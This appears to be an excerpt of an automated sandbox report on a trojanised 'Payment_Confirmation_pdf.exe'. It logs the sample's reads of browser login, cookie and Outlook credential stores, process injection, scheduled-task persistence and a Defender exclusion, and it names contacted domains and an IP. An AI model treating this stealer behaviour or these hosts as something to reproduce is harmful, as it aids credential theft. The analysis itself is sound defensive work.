                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Users\user\AppData\Roaming\cQwRvD.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      612
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      221
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      1
                      Scheduled Task/Job
                      11
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Abuse Elevation Control Mechanism
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading
                      612
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563622 Sample: Payment_Confirmation_pdf.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 61 www.egldfi.xyz 2->61 63 www.zxyck.net 2->63 65 3 other IPs or domains 2->65 81 Suricata IDS alerts for network traffic 2->81 83 Sigma detected: Scheduled temp file as task from temp location 2->83 85 Multi AV Scanner detection for submitted file 2->85 89 9 other signatures 2->89 10 Payment_Confirmation_pdf.exe 7 2->10         started        14 cQwRvD.exe 5 2->14         started        signatures3 87 Performs DNS queries to domains with low reputation 61->87 process4 file5 53 C:\Users\user\AppData\Roaming\cQwRvD.exe, PE32 10->53 dropped 55 C:\Users\user\...\cQwRvD.exe:Zone.Identifier, ASCII 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmp6A84.tmp, XML 10->57 dropped 59 C:\Users\...\Payment_Confirmation_pdf.exe.log, ASCII 10->59 dropped 91 Uses schtasks.exe or at.exe to add and modify task schedules 10->91 93 Adds a directory exclusion to Windows Defender 10->93 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        95 Multi AV Scanner detection for dropped file 14->95 97 Machine Learning detection for dropped file 14->97 99 Writes to foreign memory regions 14->99 101 2 other signatures 14->101 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        29 RegSvcs.exe 14->29         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 16->73 31 mYtMtAAMpAtCOL.exe 16->31 injected 75 Loading BitLocker PowerShell Module 19->75 34 conhost.exe 19->34         started        36 WmiPrvSE.exe 19->36         started        38 conhost.exe 21->38         started        40 conhost.exe 23->40         started        42 conhost.exe 25->42         started        process9 signatures10 111 Found direct / indirect Syscall (likely to bypass EDR) 31->111 44 sdiagnhost.exe 13 31->44         started        process11 signatures12 103 Tries to steal Mail credentials (via file / registry access) 44->103 105 Tries to harvest and steal browser information (history, passwords, etc) 44->105 107 Modifies the context of a thread in another process (thread injection) 44->107 109 3 other signatures 44->109 47 mYtMtAAMpAtCOL.exe 44->47 injected 51 firefox.exe 44->51         started        process13 dnsIp14 67 www.innovateideas.xyz 47->67 69 www.zxyck.net 118.107.250.103, 49849, 49859, 49865 OCENET-AS-APOCESdnBhdISPMY Hong Kong 47->69 71 4 other IPs or domains 47->71 77 Found direct / indirect Syscall (likely to bypass EDR) 47->77 signatures15 79 Performs DNS queries to domains with low reputation 67->79

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Payment_Confirmation_pdf.exe39%VirustotalBrowse
                      Payment_Confirmation_pdf.exe34%ReversingLabsByteCode-MSIL.Trojan.Nekark
                      Payment_Confirmation_pdf.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\cQwRvD.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\cQwRvD.exe34%ReversingLabsByteCode-MSIL.Trojan.Nekark
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      www.buckser.info1%VirustotalBrowse
                      SourceDetectionScannerLabelLink
